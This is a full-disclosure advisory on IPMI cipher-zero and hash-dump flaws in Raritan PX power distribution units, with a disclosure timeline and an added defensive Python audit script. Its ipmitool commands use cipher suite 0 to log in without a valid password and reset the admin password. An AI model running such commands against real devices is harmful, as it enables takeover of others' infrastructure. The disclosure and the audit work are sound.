Raritan PX power distribution software contains several well-known IPMI vulnerabilities, e.g.
- ipmi zero cipher
- ipmi dump hash passwords
Details:
E.g. Model DPXR20A-16:
Affected: all software releases up to and including 01.05.08 (the most recent version as of October 2013)
ipmitool -I lanplus -C 0 -H 17.XX.XX.XX -U admin -P ad shell
ipmitool> user list
2 admin true false true OEM
ipmitool> user set password 2 foo

ipmitool -I lanplus -C 0 -H 1XX.XX.XX.XX -U admin -P ad lan print
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback :
                        : User     : MD5
                        : Operator : MD5
                        : Admin    : MD5
                        : OEM      : MD5
IP Address Source       : Unspecified
IP Address              : 17.XX.XX.XX
Subnet Mask             : 255.255.255.224
MAC Address             : 00:00:00:00:00:00
SNMP Community String   : public
IP Header               : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
BMC ARP Control         : ARP Responses Enabled, Gratuitous ARP Disabled
Gratituous ARP Intrvl   : 2.0 seconds
Default Gateway IP      : 17.XX.XX.XX
Default Gateway MAC     : 00:00:00:00:00:00
Backup Gateway IP       : 0.0.0.0
Backup Gateway MAC      : 00:00:00:00:00:00
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : uuuOXXuuOXXuOXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM
Workaround:
- Block IPMI Port 623
- Attach the device to a dedicated management network only
- Don't use Raritan
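As an added audit check (not part of the original advisory and not Raritan's code), the following Python parses the text that `ipmitool ... lan print` writes and flags two of the settings shown above: RMCP+ cipher suite 0 still holding a privilege level in "Cipher Suite Priv Max" (position i of that string is the maximum privilege for cipher suite i), and the default SNMP community string. The sample output is constructed from the values on this page.

```python
import re

# Constructed sample, modelled on the advisory's `lan print` output
# (placeholder values; not captured from a real device).
SAMPLE_LAN_PRINT = """\
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
SNMP Community String   : public
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : uuuOXXuuOXXuOXX
                        :     X=Cipher Suite Unused
                        :     u=USER
"""

# Letters ipmitool prints in "Cipher Suite Priv Max"; position i is suite ID i.
PRIV_NAMES = {"X": None, "c": "CALLBACK", "u": "USER",
              "o": "OPERATOR", "a": "ADMIN", "O": "OEM"}


def parse_lan_print(text):
    """Map 'Field : value' lines to a dict; indented continuation lines
    (the legend under Priv Max) are skipped."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(\S[^:]*?)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1).strip()] = m.group(2).strip()
    return fields


def cipher0_max_priv(text):
    """Privilege level the BMC grants to cipher suite 0, or None if suite 0
    is not offered or its Priv Max slot is X (unused)."""
    f = parse_lan_print(text)
    suites = [s.strip() for s in f.get("RMCP+ Cipher Suites", "").split(",")]
    priv_max = f.get("Cipher Suite Priv Max", "")
    if "0" not in suites or not priv_max:
        return None
    return PRIV_NAMES.get(priv_max[0])


def audit_lan_print(text):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    level = cipher0_max_priv(text)
    if level is not None:
        findings.append(f"cipher suite 0 usable with max privilege {level}: "
                        "sessions need no valid password; set its Priv Max to X")
    if parse_lan_print(text).get("SNMP Community String", "").lower() == "public":
        findings.append("SNMP community string is the default 'public'")
    return findings
```

On BMCs that honour it, the privilege string is changed with `ipmitool lan set <channel> cipher_privs <string>`; re-run the audit on fresh `lan print` output afterwards, since the advisory notes the vendor fix could not be verified.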
Timeline:
2014/02/19 - Contacted CERT, VR#HRS35Y8S
2014/05/20 - Vendor claims it's fixed but won't release new firmware to verify.
2014/07/03 - Vendor claims it's fixed but still won't release new firmware to verify, nor will they send the firmware to me.
2014/07/03 - FD because of lack of interest and time
Authored by Joerg Kost
joerg.kost.fd@gmx.eu
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information